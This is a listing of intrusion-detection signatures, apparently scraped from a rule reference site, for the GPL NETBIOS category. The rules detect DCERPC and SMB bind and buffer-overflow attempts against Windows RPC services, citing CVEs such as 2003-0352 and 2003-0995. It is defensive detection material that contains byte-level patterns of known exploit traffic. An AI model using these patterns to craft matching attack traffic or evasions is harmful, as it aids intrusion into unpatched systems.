Performance Impact : Not defined

2103159

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC CoGetInstanceFromFile overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103159; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC CoGetInstanceFromFile overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103275

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IActivation bind attempt"; flow:established,to_server; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; classtype:protocol-command-decode; sid:2103275; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC IActivation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103276

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IActivation little endian bind attempt"; flow:established,to_server; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; classtype:protocol-command-decode; sid:2103276; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC IActivation little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103198

#alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC ISystemActivator path overflow attempt big endian"; flow:to_server,established; content:"|05|"; byte_test:1,<,16,3,relative; content:"|5C 00 5C 00|"; byte_test:4,>,256,-8,relative; flowbits:isset,dce.isystemactivator.bind; reference:bugtraq,8205; reference:cve,2003-0352; reference:nessus,11808; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103198; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC ISystemActivator path overflow attempt big endian

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8205|cve,2003-0352|nessus,11808|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103197

#alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC ISystemActivator path overflow attempt little endian"; flow:to_server,established; content:"|05|"; byte_test:1,&,16,3,relative; content:"|5C 5C|"; byte_test:4,>,256,-8,little,relative; flowbits:isset,dce.isystemactivator.bind; reference:bugtraq,8205; reference:cve,2003-0352; reference:nessus,11808; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103197; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC ISystemActivator path overflow attempt little endian

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8205|cve,2003-0352|nessus,11808|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103238

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IrotIsRunning attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_test:4,>,128,0,relative; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103238; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC IrotIsRunning attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103239

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IrotIsRunning little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_test:4,>,128,0,little,relative; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103239; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC IrotIsRunning little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103236

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC irot bind attempt"; flow:established,to_server; content:"|05|"; depth:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103236; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC irot bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103237

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC irot little endian bind attempt"; flow:established,to_server; content:"|05|"; depth:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103237; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC irot little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103156

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC msqueue bind attempt"; flow:to_server,established; content:"|05|"; depth:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103156; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC msqueue bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103157

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC msqueue little endian bind attempt"; flow:to_server,established; content:"|05|"; depth:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103157; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC msqueue little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103195

#alert tcp $EXTERNAL_NET any -> $HOME_NET 137 (msg:"GPL NETBIOS name query overflow attempt TCP"; flow:to_server,established; byte_test:1,&,64,2; content:" "; offset:12; isdataat:56,relative; metadata: former_category NETBIOS; reference:bugtraq,9624; reference:cve,2003-0825; classtype:attempted-admin; sid:2103195; rev:5; metadata:created_at 2010_09_23, updated_at 2017_11_10;)

Name : name query overflow attempt TCP

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9624|cve,2003-0825

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2017-11-10

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103180

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103180; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103430

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103430; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103181

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103181; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103431

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103431; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103182

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103182; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103432

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103432; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103381

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103381; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103382

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103382; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103383

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103383; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103384

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103384; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103397

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103397; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103398

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103398; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103399

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103399; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103400

